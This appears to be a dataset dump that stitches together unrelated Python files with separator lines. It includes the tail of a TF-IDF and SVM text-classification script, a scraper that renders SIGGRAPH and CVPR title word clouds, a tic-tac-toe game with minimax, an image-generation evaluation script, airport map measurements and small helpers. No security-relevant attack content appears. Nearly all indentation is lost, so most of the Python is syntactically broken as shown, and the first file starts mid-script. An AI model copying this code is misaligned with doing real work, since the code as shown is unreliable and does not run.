tf_train, tf_test = df[df['Set'] != 1], df[df['Set'] == 1]
tf_training_corpus = tf_train['Sentence'].values
tf_training_labels = tf_train[Label].values
tf_test_corpus = tf_test['Sentence'].values
tf_test_labels = tf_test[Label].values
tf_idf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2, max_features=5000, stop_words='english')
tfidf = tf_idf_vectorizer.fit_transform(tf_training_corpus)
    X = tfidf.todense()  # reuse the matrix fitted above instead of fitting the vectorizer a second time
featurized_training_data = []
for x in range(0, len(X)):
tfid_Features = np.array(X[x][0]).reshape(-1, )
featurized_training_data.append(tfid_Features)
FeatureNames = []
tf_dimension = X.shape[1]
for x in range(0, tf_dimension):
FeatureNames.append("TFIDF_" + str(x))
X = tf_idf_vectorizer.transform(tf_test_corpus).todense()
featurized_test_data = []
for x in range(0, len(X)):
tfid_Features = np.array(X[x][0]).reshape(-1, )
featurized_test_data.append(tfid_Features)
# Merge the feature data if 'All' or get the TF-IDF Features if 'TF'
if Features == 'All':
featurized_training_data_df = DataFrame(featurized_training_data, columns=FeatureNames)
training_corpus = pd.concat([training_corpus, featurized_training_data_df], axis=1)
test_corpus = test_corpus.reset_index()
test_corpus = test_corpus.drop(['index'], axis=1)
featurized_test_data_df = DataFrame(featurized_test_data, columns=FeatureNames)
test_corpus = pd.concat([test_corpus, featurized_test_data_df], axis=1)
elif Features == 'TF':
featurized_training_data_df = DataFrame(featurized_training_data, columns=FeatureNames)
training_corpus = featurized_training_data_df
featurized_test_data_df = DataFrame(featurized_test_data, columns=FeatureNames)
test_corpus = featurized_test_data_df
# Get the labels from the original data frame
temp1 = df.head(dataset)
temp2 = df.tail((df['Set'] == 1).sum())
training_labels = temp1[Label].values
test_labels = temp2[Label].values
training_labels = training_labels.astype(int)
test_labels = test_labels.astype(int)
# Create final dataset for Testing & Training by joining Labels
train = pd.DataFrame(training_corpus)
test = pd.DataFrame(test_corpus)
mapping = dict(zip(np.unique(training_labels), np.arange(len(TargetNames))))
mapping_2 = dict(zip(np.unique(test_labels), np.arange(len(TargetNames))))
train[Label] = pd.Categorical.from_codes(pd.Series(training_labels).map(mapping), TargetNames)
test[Label] = pd.Categorical.from_codes(pd.Series(test_labels).map(mapping_2), TargetNames)
# Show the number of observations for the test and training data frames
print(" ")
class_report.write('\n')
print("===============")
class_report.write("===============\n")
print("Fold Information: ")
class_report.write("Fold Information: \n")
print('Number of observations in the training data:', len(train))
class_report.write('Number of observations in the training data: ' + str(len(train)) + '\n')
print('Number of observations in the test data:', len(test))
class_report.write('Number of observations in the test data: ' + str(len(test)) + '\n')
print('Number of features generated:', str(tf_dimension + bert_dimension))
class_report.write('Number of features generated: ' + str(tf_dimension + bert_dimension) + '\n')
# Create a list of the feature column's names
features = train.columns[:(tf_dimension + bert_dimension)]
# Create a classifier. By convention, clf means 'classifier'
if Algorithm == "SVC":
clf = SVC(kernel='rbf', class_weight='balanced', probability=True)
if Algorithm == "SVC-Sweep":
clf = SVC(kernel='poly', class_weight='balanced', C=1, decision_function_shape='ovo', gamma=0.0001,
probability=True)
if Algorithm == "LSVC":
clf = svm.LinearSVC()
if Algorithm == "RF":
clf = RandomForestClassifier(n_jobs=-1, class_weight="balanced")
if Algorithm == "GBT":
clf = GradientBoostingClassifier(n_estimators=100, learning_rate=1.0, max_depth=1, random_state=0)
if Algorithm == "VT":
clf1 = SVC(kernel='rbf', class_weight="balanced", probability=True)
clf2 = RandomForestClassifier(n_jobs=-1, class_weight="balanced")
clf3 = GradientBoostingClassifier(n_estimators=100, learning_rate=1.0, max_depth=1, random_state=0)
clf = VotingClassifier(estimators=[('svc', clf1), ('rf', clf2), ('gbt', clf3)], voting='soft', weights=[1, 1, 1])
# Train the classifier to take the training features and learn how they relate
clf.fit(train[features], train[Label])
# Apply the classifier we trained to the test data (which, remember, it has never seen before)
preds = clf.predict(test[features])
if Algorithm == "SVC" or Algorithm == "SVC-Sweep":
    # Output the probabilities for the SVC; it's possible this could be extended to other algorithms
# TODO: Investigate
# Below this is some legacy code which will allow you to filter the output and see it reflected
# in the stats below by swapping in y_pred but this can have a whacky interaction with other classifiers
preds_proba = clf.predict_proba(test[features])
y_pred = (clf.predict_proba(test[features])[:, 1] >= 0.695).astype(bool)
# View the PREDICTED classes for the first five observations
print(" ")
class_report.write('\n')
print("===============")
class_report.write("===============\n")
print("Example Prediction: ")
class_report.write("Example Prediction: \n")
print(preds[0:5])
class_report.write(str(preds[0:5]))
if Algorithm == "SVC" or Algorithm == "SVC-Sweep":
with open(output_probs, 'w', newline='') as my_csv:
csvWriter = csv.writer(my_csv, delimiter=',')
csvWriter.writerows(preds_proba)
# View the ACTUAL classes for the first five observations
print(" ")
class_report.write('\n')
print("===============")
class_report.write("===============\n")
print("Actual: ")
class_report.write("Actual: \n")
print(str(test[Label].head()))
class_report.write(str(test[Label].head()) + '\n')
# Create confusion matrix
print(" ")
class_report.write('\n')
print("===============")
class_report.write("===============\n")
print("Confusion Matrix: ")
class_report.write("Confusion Matrix: \n")
print(" ")
class_report.write('\n')
confusion_matrix = pd.crosstab(test[Label], preds, rownames=['Actual Categories'], colnames=['Predicted Categories'])
print(str(pd.crosstab(test[Label], preds, rownames=['Actual Categories'], colnames=['Predicted Categories'])))
class_report.write(str(pd.crosstab(test[Label], preds, rownames=['Actual Categories'], colnames=['Predicted Categories'])))
# Show confusion matrix in a separate window
sn.set(font_scale=1.4) # for label size
g = sn.heatmap(confusion_matrix, annot=True, annot_kws={"size": 12}, cmap="YlGnBu", cbar=False) # font size
bottom, top = g.get_ylim()
g.set_ylim(bottom + 0.5, top - 0.5)
plt.show()
# Precision, Recall, F1
print(" ")
print("===============")
print("Classification Report: ")
print(" ")
class_report.write('\n')
class_report.write("===========\n")
class_report.write("Classification Report: \n")
class_report.write(" \n")
print("Precision, Recall, Fbeta Stats: ")
print('Macro: ', precision_recall_fscore_support(test[Label], preds, average='macro'))
print('Micro: ', precision_recall_fscore_support(test[Label], preds, average='micro'))
print('Weighted', precision_recall_fscore_support(test[Label], preds, average='weighted'))
print(" ")
class_report.write("Precision, Recall, Fbeta Stats: \n")
class_report.write('Macro: ' + str(precision_recall_fscore_support(test[Label], preds, average='macro')) + '\n')
class_report.write('Micro: ' + str(precision_recall_fscore_support(test[Label], preds, average='micro')) + '\n')
class_report.write('Weighted' + str(precision_recall_fscore_support(test[Label], preds, average='weighted')) + '\n')
class_report.write(" \n")
target_names_int = [int(name) for name in TargetNamesStrings]
target_names_int.sort()
TargetNamesStrings = [str(key_dict[x]) + '-' + str(x) for x in target_names_int]
print(classification_report(test[Label], preds, target_names=TargetNamesStrings))
class_report.write(str(classification_report(test[Label], preds, target_names=TargetNamesStrings)))
# Generate PR Curve (if doing a binary classification)
if (Algorithm == "SVC" or Algorithm == "SVC-Sweep") and (Label != "Multi-class" and Label != "Original-Multi-Class"):
y_score = clf.decision_function(test[features])
average_precision = average_precision_score(test[Label], y_score)
print('Average precision-recall score: {0:0.2f}'.format(average_precision))
class_report.write('Average precision-recall score: {0:0.2f}'.format(average_precision) + '\n')
disp = plot_precision_recall_curve(clf, test[features], test[Label])
    disp.ax_.set_title('2-class Precision-Recall curve: AP={0:0.2f}'.format(average_precision))
plt.show()
# save the model to disk
pickle.dump(clf, open(output_model_filename, 'wb'))
# parameter sweep
if Sweep and Algorithm == "SVC":
param_grid = [
{'C': [1, 10, 100, 1000], 'kernel': ['linear'], 'decision_function_shape': ['ovo', 'ovr']},
{'C': [1, 10, 100, 1000], 'gamma': ['scale', 'auto', 0.001, 0.0001], 'kernel': ['rbf'],
'decision_function_shape': ['ovo', 'ovr']},
{'C': [1, 10, 100, 1000], 'gamma': ['scale', 'auto', 0.001, 0.0001], 'kernel': ['poly'],
'decision_function_shape': ['ovo', 'ovr']},
{'C': [1, 10, 100, 1000], 'gamma': ['scale', 'auto', 0.001, 0.0001], 'kernel': ['sigmoid'],
'decision_function_shape': ['ovo', 'ovr']}
]
print("")
class_report.write('\n')
print("Starting GridSearch; this could take some time...")
search = GridSearchCV(clf, param_grid, cv=5, n_jobs=-1).fit(train[features], train[Label])
print(search.best_params_)
print(search.best_score_)
print(search.best_estimator_)
class_report.write(str(search.best_params_))
class_report.write(str(search.best_score_))
class_report.write(str(search.best_estimator_))
class_report.close()
exit()
| StarcoderdataPython |
3253171 | <gh_stars>0
# import urllib.request
import re
import os
import collections
import math
import sys
# import lxml
# from lxml import html
import requests
import time
from datetime import datetime
HTML_PREFIX = """\
<html>
<head>
<title>SIGGRAPH Word Clouds</title>
<meta name="author" content="<NAME>">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro" rel="stylesheet">
<link href="static/main.css" rel="stylesheet" type="text/css">
</head>
<body>
"""
HTML_POSTFIX = """\
<!-- Start of StatCounter Code for Default Guide -->
<script type="text/javascript">
var sc_project=10471620;
var sc_invisible=1;
var sc_security="81ba45aa";
var scJsHost = (("https:" == document.location.protocol) ?
"https://secure." : "http://www.");
document.write("<sc"+"ript type='text/javascript' src='" +
scJsHost+
"statcounter.com/counter/counter.js'></"+"script>");
</script>
<noscript><div class="statcounter"><a title="shopify traffic
stats" href="http://statcounter.com/shopify/"
target="_blank"><img class="statcounter"
src="http://c.statcounter.com/10471620/0/81ba45aa/1/"
alt="shopify traffic stats"></a></div></noscript>
<!-- End of StatCounter Code for Default Guide -->
</body>
</html>
"""
# lower case only
CommonWords = ['and', 'or', 'for', 'of', 'by', 'is',
'a', 'with', 'using', 'in', 'from', 'the',
'3d', 'on', 'via', 'to', 'an', 'graphics', 'design', ]
def RemoveHTMLComments(str):
return re.sub('<!--.*?-->', '', str, flags=re.DOTALL)
# fetch a list of paper titles from ke-sen's page
def GetPaperTitles(str, confname):
if confname == "CVPR":
return re.findall('<dt class=\"ptitle\"><br><a href=\"[^\"]+\">[^<]+</a></dt>', str, flags=re.IGNORECASE)
else:
return re.findall('<dt><B>[^<]+</B>', str, flags=re.IGNORECASE)
# fetch words from paper titles, convert to lower case, remove special characters
def GetPaperTitleWords(titles):
return (re.sub('(<[^<]+?>)|:|\(|\)|,|!|\+', '', (" ").join(titles))).lower().split(' ')
def RemoveCommonWords(words):
return [w for w in words if w not in CommonWords]
def GetTopWords(words, N):
    counter = collections.Counter(words)
return counter.most_common(N)
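# Example (added for clarity): GetTopWords(['render', 'render', 'shadow'], 2) -> [('render', 2), ('shadow', 1)]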
def isqrt(x):
fsqrt = math.sqrt(float(x))
return int(fsqrt)
# ---------- #
# -- main -- #
# ---------- #
def findTop5Words(prefix, postfix, title, Years, outFilename):
allWords = []
outFile = open(outFilename, 'w')
outFile.write(HTML_PREFIX)
outFile.write("<table class=\"ex\"><tr><td>")
outFile.write("<br><p class=\"page_title\">%s Paper Title Word Clouds</p>\n" % title)
outFile.write("<p>A very poor attempt to identify trends in graphics/ML research.</p>\n")
outFile.write("<strong>Notes</strong><ul>\n")
if prefix == "CVPR":
outFile.write("<li>Using data from <a href=\"http://openaccess.thecvf.com\">CVPR Open Access Page</a>. For source of this script, <a href=\"https://github.com/ap1/siggraph-wordcloud\">click here</a>.</li>\n")
else:
outFile.write("<li>Using data from <a href=\"http://kesen.realtimerendering.com\"><NAME>'s page</a>. For source of this script, <a href=\"https://github.com/ap1/siggraph-wordcloud\">click here</a>.</li>\n")
outFile.write("<li>Words ignored: %s</li>\n" % ((", ").join(sorted(CommonWords))))
outFile.write("<li>If you use this tool, please respect the host's bandwidth limits and only run it a few times, offline.</li>\n")
outFile.write("<li>Feedback: anjul dot patney at gmail dot com</li>\n")
outFile.write("</ul>\n")
rawWords = "<ul>"
for Year in Years:
# try:
if prefix == "CVPR":
fetchURL = "http://openaccess.thecvf.com/%s%s%s" % (prefix, Year, postfix)
else:
fetchURL = "http://kesen.realtimerendering.com/%s%s%s" % (prefix, Year, postfix)
print (fetchURL)
try:
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
}
# req = urllib.request.Request(fetchURL, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'})
time.sleep(0.5)
with requests.get(fetchURL, headers=headers) as page:
#print (response.content)
webhtml = RemoveHTMLComments(page.text)
titles = GetPaperTitles(webhtml, prefix)
titleWords = GetPaperTitleWords(titles)
titleWords = RemoveCommonWords(titleWords)
allWords = allWords + titleWords
topWords = GetTopWords(titleWords, 10)
nWords = len(titleWords)
print("Found %d potentially useful words" % (nWords))
# print(page.text)
if nWords > 10:
outFile.write("<p class=\"topic_header\"><a href = %s>%s %s (%d)</a></p>" % (fetchURL, title, Year, nWords))
outFile.write("\n<div class=\"topic_content\">\n")
for word in topWords:
fontSizePc = 100
textdarkness = 250
freq = 100.0 * float(word[1])/float(nWords)
if (freq > 1.0): fontSizePc, textdarkness = 250, 250
elif(freq > 0.9): fontSizePc, textdarkness = 200, 225
elif(freq > 0.8): fontSizePc, textdarkness = 180, 200
elif(freq > 0.7): fontSizePc, textdarkness = 150, 150
elif(freq > 0.6): fontSizePc, textdarkness = 125, 100
elif(freq > 0.5): fontSizePc, textdarkness = 100, 50
elif(freq > 0.4): fontSizePc, textdarkness = 70, 40
elif(freq > 0.3): fontSizePc, textdarkness = 50, 40
elif(freq > 0.2): fontSizePc, textdarkness = 30, 40
elif(freq > 0.1): fontSizePc, textdarkness = 20, 40
elif(freq > 0.05): fontSizePc, textdarkness = 10, 40
else: fontSizePc, textdarkness = 5, 40
textintensity = 255 - textdarkness
outFile.write("<span style=\"font-size: %d%%; color: rgb(%d,%d,%d)\">%s</span> (%d) " % (fontSizePc, textintensity, textintensity, textintensity, word[0], word[1]))
outFile.write("\n</div>\n")
rawWords = rawWords + "<li><span style=\"font-size: 250%%\">%s %s</span><br>" % (title, Year) + (", ").join(titleWords) + "\n\n"
else:
print ("error")
except: #urllib.request.URLError as e:
print ("Error: " + str(sys.exc_info()))
return None
outFile.write("</td></tr></table>\n")
rawWords = rawWords + "</ul>\n"
#outFile.write("<p><strong>Raw Words:</strong> " + rawWords + "\n")
outFile.write(HTML_POSTFIX)
outFile.close()
return allWords
def revYearRange(beg, end):
return reversed([str(y) for y in range(beg, end+1)])
allWords = {}
allWords["cvpr"] = findTop5Words("CVPR", ".py", "CVPR", revYearRange(2013, datetime.today().year+1), "cvpr.html")
allWords["sig"] = findTop5Words("sig", ".html", "SIGGRAPH", revYearRange(2008, datetime.today().year+1), "sig.html")
allWords["siga"] = findTop5Words("siga", "Papers.htm", "SIGGRAPH Asia", revYearRange(2008, datetime.today().year+1), "siga.html")
allWords["hpg"] = findTop5Words("hpg", "Papers.htm", "HPG", revYearRange(2009, datetime.today().year+1), "hpg.html")
allWords["egsr"] = findTop5Words("egsr", "Papers.htm", "EGSR", revYearRange(2009, datetime.today().year+1), "egsr.html")
for awk in allWords.keys():
aw = allWords[awk]
aw = list(GetTopWords(aw, 500))
wordlist = ",".join([a[0] for a in aw])
f = open(awk + "_words.txt", "w")
f.write(wordlist)
f.close()
| StarcoderdataPython |
69087 | <filename>tictactoe.py
#!/usr/bin/env python
# coding=utf-8
__author__ = 'Xevaquor'
__license__ = 'MIT'
from copy import deepcopy
import random
from minmax import MinmaxAgent
from common import Field
class RandomAgent(object):
def __init__(self, symbol=Field.Circle):
self.symbol = symbol
def make_move(self, state, game):
valid_moves = filter(lambda m: m[0] == self.symbol, game.get_legal_moves(state))
return random.choice(valid_moves)
class HumanAgent(object):
def __init__(self, symbol=Field.Cross):
self.symbol = symbol
def make_move(self, state, game):
while True:
coords = tuple(map(int, raw_input("Gimme coordinates: (y x) ").split(' ')))
move = (self.symbol, coords)
if move in game.get_legal_moves(state, self.symbol):
return move
class State(object):
def __init__(self):
self.grid = [
[Field.Empty, Field.Empty, Field.Empty],
[Field.Empty, Field.Empty, Field.Empty],
[Field.Empty, Field.Empty, Field.Empty]
]
def __str__(self):
lines = []
for y in range(3):
# noinspection PyTypeChecker
lines.append('|' + ''.join(self.grid[y]) + '|')
return '+---+\n' + '\n'.join(lines) + '\n+---+\n'
# noinspection PyMethodMayBeStatic
class TicTacToe(object):
def __init__(self):
pass
def get_start_state(self):
return State()
def get_legal_moves(self, state, player):
moves = []
for y in range(3):
for x in range(3):
if state.grid[y][x] == Field.Empty:
moves += [(player, (y, x))]
return moves
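    # Example (added): on an empty board this yields 9 moves of the form
    # (player, (row, col)), e.g. (Field.Cross, (0, 0)) ... (Field.Cross, (2, 2)).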
def apply_move(self, state, move):
player, coord = move
y, x = coord
new_state = deepcopy(state)
new_state.grid[y][x] = player
return new_state
def has_won(self, state, player):
winning_combinations = [
[(0, 0), (1, 0), (2, 0)],
[(0, 1), (1, 1), (2, 1)],
[(0, 2), (1, 2), (2, 2)],
[(0, 0), (1, 1), (2, 2)],
[(0, 2), (1, 1), (2, 0)],
[(0, 0), (0, 1), (0, 2)],
[(1, 0), (1, 1), (1, 2)],
[(2, 0), (2, 1), (2, 2)]
]
for combination in winning_combinations:
streak = True
for y, x in combination:
if state.grid[y][x] != player:
streak = False
break
if streak:
return True
return False
def has_lose(self, state, player):
opponent = Field.Circle if player == Field.Cross else Field.Cross
return self.has_won(state, opponent)
def is_terminal(self, state):
if self.has_won(state, Field.Circle):
return True
if self.has_won(state, Field.Cross):
return True
for y in range(3):
for x in range(3):
if state.grid[y][x] == Field.Empty:
return False
return True
if __name__ == "__main__":
ha = HumanAgent()
ca = MinmaxAgent()
g = TicTacToe()
s = g.get_start_state()
human_turn = True
while True:
if g.has_won(s, Field.Circle):
print "Circle won!"
break
elif g.has_won(s, Field.Cross):
print "Cross won!"
break
elif g.is_terminal(s):
print "DRAW!"
break
if human_turn:
print s
taken_move = ha.make_move(s, g)
else:
taken_move = ca.make_move(s, g)
s = g.apply_move(s, taken_move)
human_turn = not human_turn
print "Game finished"
print s
| StarcoderdataPython |
3297201 | from evaluation.inception import InceptionScore
import re
import cv2
import numpy as np
import pandas as pd
import matplotlib
from sg2im.data import deprocess_batch, imagenet_deprocess
from sg2im.data.utils import decode_image
matplotlib.use('Agg')
from sg2im.meta_models import MetaGeneratorModel
import argparse, os
import torch
from types import SimpleNamespace
import json
def check_model_layout(df, model, inception_score, output_dir, deprocess_func, vocab, mode="gt"):
inception_score.clean()
model.args['skip_graph_model'] = True
with torch.no_grad():
img_ind = 0
for i, row in df.iterrows():
try:
print("Iteration {}".format(img_ind))
# Get boxes
if mode == 'pred':
bbox = np.array(eval(row['predicted_boxes']))
else:
bbox = np.array(eval(row['gt_boxes']))
# bbox[:, 2] = bbox[:, 0] + bbox[:, 2]
# bbox[:, 3] = bbox[:, 1] + bbox[:, 3]
# bbox = np.concatenate([bbox, [[0, 0, 1, 1]]], axis=0)
# Get labels
object_class = eval(row['class'])
indx = np.where(np.array(object_class) != '__image__')[0]
label_one_hot = [c for c in object_class if c != "__image__"]
label_one_hot = np.array([vocab["object_name_to_idx"][c] if c in vocab["object_name_to_idx"] else 180 for c in label_one_hot])
# label_one_hot.append(vocab['object_name_to_idx']['__image__'])
# print(label_one_hot)
bbox = bbox[indx]
label_one_hot = label_one_hot[indx]
# Get Image_id
if args.dataset == "vg":
obj_mask = np.array(label_one_hot) < 179
label_one_hot = np.array(label_one_hot)[obj_mask]
bbox = bbox[obj_mask]
# image_id = row['image_id'].split('/')[-1].split('.')[0]
image_id = re.findall(r'\d+', row['image_id'])[0]
else:
# image_id = row['image_id']
image_id = re.findall(r'\d+', row['image_id'])[0]
image_ids = [image_id]
boxes = torch.FloatTensor(bbox).unsqueeze(0)
labels = torch.LongTensor(label_one_hot)
objs = labels.long().unsqueeze(0).unsqueeze(-1).cuda()
samples = {}
triplets, triplet_type, masks = None, None, None
name = '{mode}_box_{mode}_mask'.format(mode=mode)
samples[name] = model(objs, triplets, triplet_type, boxes_gt=boxes, masks_gt=masks, test_mode=True)[0]
# Calc Inception score
inception_score(samples[name])
# Save images
draw_datasets(samples, output_dir, deprocess_func, image_ids)
img_ind += 1
except Exception as e:
print("Exception in iter {} - {}".format(img_ind, e))
inception_mean, inception_std = inception_score.compute_score(splits=5)
print(' >> ' + str(mode.upper()) + ' inception_mean: %.4f' % inception_mean)
print(' >> ' + str(mode.upper()) + ' inception_std: %.4f' % inception_std)
def draw_datasets(samples, output_dir, deprocess_func, image_ids):
for k, v in samples.items():
samples[k] = np.transpose(deprocess_batch(v, deprocess_func=deprocess_func).cpu().numpy(), [0, 2, 3, 1])
for k, v in samples.items():
# Set the output path
if k == 'gt_img':
path = os.path.join(output_dir, "gt")
else:
path = os.path.join(output_dir, "generation", k)
os.makedirs(path, exist_ok=True)
for i in range(v.shape[0]):
RGB_img_i = cv2.cvtColor(v[i], cv2.COLOR_BGR2RGB)
cv2.imwrite("{}/{}.jpg".format(path, image_ids[i]), RGB_img_i)
def main(args):
if not os.path.isfile(args.checkpoint):
print('ERROR: Checkpoint file "%s" not found' % args.checkpoint)
print('Maybe you forgot to download pretraind models? Try running:')
print('bash scripts/download_models.sh')
return
if not os.path.isdir(args.output_dir):
print('Output directory "%s" does not exist; creating it' % args.output_dir)
os.makedirs(args.output_dir)
if args.gpu_ids == 'cpu':
device = torch.device('cpu')
elif args.gpu_ids == 'gpu':
device = torch.device('cuda:0')
if not torch.cuda.is_available():
print('WARNING: CUDA not available; falling back to CPU')
device = torch.device('cpu')
else:
device = torch.device('cuda:{gpu}'.format(gpu=args.gpu_ids[0]))
if not torch.cuda.is_available():
print('WARNING: CUDA not available; falling back to CPU')
device = torch.device('cpu')
# Load the model, with a bit of care in case there are no GPUs
map_location = 'cpu' if device == torch.device('cpu') else device
checkpoint = torch.load(args.checkpoint, map_location=map_location)
trained_args = json.load(open(os.path.join(os.path.dirname(args.checkpoint), 'run_args.json'), 'rb'))
set_args(args, trained_args)
# Model
opt = SimpleNamespace(**trained_args)
opt.skip_graph_model = True
args.dataset = opt.dataset if not args.dataset else args.dataset
model = MetaGeneratorModel(opt, device)
# Load pre-trained weights for generation
model.load_state_dict(checkpoint['model_state'], strict=False)
# Eval
model.eval()
# Put on device
model.to(device)
# Init Inception Score
inception_score = InceptionScore(device, batch_size=opt.batch_size, resize=True)
# Get the data
df = pd.read_csv(args.data_frame)
check_model_layout(df, model, inception_score, args.output_dir, opt.deprocess_func, opt.vocab, mode=args.mode)
print(" >> Dataset generated in {}".format(args.output_dir))
def set_args(args, trained_args):
trained_args['gpu_ids'] = args.gpu_ids
# Define img_deprocess
if trained_args['img_deprocess'] == "imagenet":
trained_args['deprocess_func'] = imagenet_deprocess
elif trained_args['img_deprocess'] == "decode_img":
trained_args['deprocess_func'] = decode_image
else:
print("Error: No deprocess function was found. decode_image was chosen")
trained_args['deprocess_func'] = decode_image
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--checkpoint', default='')
parser.add_argument('--output_dir', default='')
parser.add_argument('--data_frame', default='')
parser.add_argument('--mode', default='pred')
parser.add_argument('--dataset', default='', choices=['vg', 'clevr', 'coco'])
parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
args = parser.parse_args()
# set gpu ids
str_ids = args.gpu_ids.split(',')
args.gpu_ids = []
for str_id in str_ids:
id = int(str_id)
if id >= 0:
args.gpu_ids.append(id)
if len(args.gpu_ids) > 0:
torch.cuda.set_device(args.gpu_ids[0])
main(args)
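    # Example invocation (added; script name and paths are hypothetical):
    #   python evaluate_layout_generation.py --checkpoint runs/exp1/model.pt --data_frame layouts.csv --output_dir results/ --mode pred --gpu_ids 0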
| StarcoderdataPython |
3335800 | """
reset database
"""
from patch_tracking.app import app
from patch_tracking.database import reset_database
def reset():
"""
reset database
"""
with app.app_context():
reset_database()
if __name__ == "__main__":
reset()
| StarcoderdataPython |
30179 | import itertools
import math
import pprint
import sys
import typing
import map_funcs
GOOGLE_EARTH_AIRPORT_IMAGES = {
'GoogleEarth_AirportCamera_C.jpg' : {
'path': 'video_images/GoogleEarth_AirportCamera_C.jpg',
'width': 4800,
'height': 3011,
# Originally measured on the 100m legend as 181 px
# 'm_per_px': 100 / (4786 - 4605),
# Corrected to 185 to give runway length of 1650.5 m
'm_per_px': 100 / (4786 - 4601),
'datum': 'runway_23_start',
'measurements': {
# 'datum_1': 'runway_23_end',
'runway_23_start': map_funcs.Point(3217, 204),
'runway_23_end': map_funcs.Point((1310 + 1356) / 2, (2589 + 2625) / 2),
'perimeter_fence': map_funcs.Point(967, 2788),
'red_building': map_funcs.Point(914, 2827),
'helicopter': map_funcs.Point(2630, 1236),
'camera_B': map_funcs.Point(2890, 1103),
'buildings_apron_edge': map_funcs.Point(2213, 1780),
# The next three are from camera B frame 850
# Dark smudge on right
'right_dark_grass': map_funcs.Point(2742, 1137),
# Pale smudge on right where tarmac meets grass
'right_light_grass': map_funcs.Point(2755, 1154),
# Pale smudge on left where tarmac taxiway meets grass
# 'left_light_grass': map_funcs.Point(2492, 1488),
# Bright roofed house
'bright_roofed_house': map_funcs.Point(1067, 2243),
}
},
}
# This is an estimate of the absolute position error in metres of a single point in isolation.
ABSOLUTE_POSITION_ERROR_M = 10.0
# Points this close together have an accuracy of ABSOLUTE_POSITION_ERROR_M.
# If closer then the error is proportionally less.
# If further apart then the error is proportionally greater.
RELATIVE_POSITION_ERROR_BASELINE_M = 1000.0
RELATIVE_BEARING_ERROR_DEG = 0.5
def relative_position_error(distance_between: float) -> float:
"""This returns a relative position error estimate of two points separated by distance_between.
It holds the idea that it is extremely unlikely that two points close together have extreme errors
but as they separate the error is likely to be greater.
"""
return ABSOLUTE_POSITION_ERROR_M * distance_between / RELATIVE_POSITION_ERROR_BASELINE_M
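# Worked example (added): two points 500 m apart get an estimated relative error of
# 10.0 * 500 / 1000 = 5.0 m; points 2 km apart get 20 m.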
RUNWAY_LENGTH_M = map_funcs.distance(
GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']['runway_23_start'],
GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']['runway_23_end'],
GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['m_per_px'],
)
RUNWAY_HEADING_DEG = map_funcs.bearing(
GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']['runway_23_start'],
GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']['runway_23_end'],
)
def measurements_relative_to_runway() -> typing.Dict[str, map_funcs.Point]:
"""Returns a dict of measurements in metres that are reduced to the runway axis."""
ret: typing.Dict[str, map_funcs.Point] = {}
datum_name = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['datum']
origin = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements'][datum_name]
m_per_px = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['m_per_px']
for k in GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']:
pt = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements'][k]
new_pt = map_funcs.translate_rotate(pt, RUNWAY_HEADING_DEG, origin)
ret[k] = map_funcs.Point(m_per_px * new_pt.x, m_per_px * new_pt.y)
return ret
def bearings_from_camera_b() -> typing.Dict[str, float]:
ret: typing.Dict[str, float] = {}
camera_b = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements']['camera_B']
m_per_px = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['m_per_px']
for k, v in GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['measurements'].items():
if k != 'camera_B':
b = map_funcs.bearing(camera_b, v)
b_min, b_max = map_funcs.bearing_min_max(camera_b, v, ABSOLUTE_POSITION_ERROR_M / m_per_px)
ret[k] = b, b_min, b_max
return ret
def main() -> int:
# Check scale and runway length
m_per_px = GOOGLE_EARTH_AIRPORT_IMAGES['GoogleEarth_AirportCamera_C.jpg']['m_per_px']
print(f'GoogleEarth_AirportCamera_C.jpg scale {m_per_px:0.4f} (m/pixel)')
print(f'GoogleEarth_AirportCamera_C.jpg runway length {RUNWAY_LENGTH_M:.1f} (m)')
print(f'GoogleEarth_AirportCamera_C.jpg runway heading {RUNWAY_HEADING_DEG:.2f} (degrees)')
measurements = measurements_relative_to_runway()
print('X-Y Relative')
for k in measurements:
print(f'{k:24} : x={measurements[k].x:8.1f} y={measurements[k].y:8.1f}')
bearings = bearings_from_camera_b()
print('Bearings')
for k in bearings:
# print(f'{k:24} : {bearings[k]:8.1f}')
b, b_min, b_max = bearings[k]
# print(f'{k:24} : {bearings[k]}')
print(f'{k:24} : {b:8.2f} ± {b_max - b:.2f}/{b_min - b:.2f}')
for a, b in itertools.combinations(('red_building', 'helicopter', 'buildings_apron_edge'), 2):
ba, ba_min, ba_max = bearings[a]
bb, bb_min, bb_max = bearings[b]
print(a, '<->', b)
print(f'{ba - bb:4.2f} {ba_max - bb_min:4.2f} {ba_min - bb_max:4.2f}')
return 0
if __name__ == '__main__':
sys.exit(main()) | StarcoderdataPython |
89385 | <reponame>EricFelixLuther/quiz_app<gh_stars>0
from django.contrib import admin
from .models import Quiz_Set, Question
admin.site.register([Quiz_Set, Question])
| StarcoderdataPython |
1641861 | #!/usr/bin/python2.7
# -*- coding: utf-8 -*-
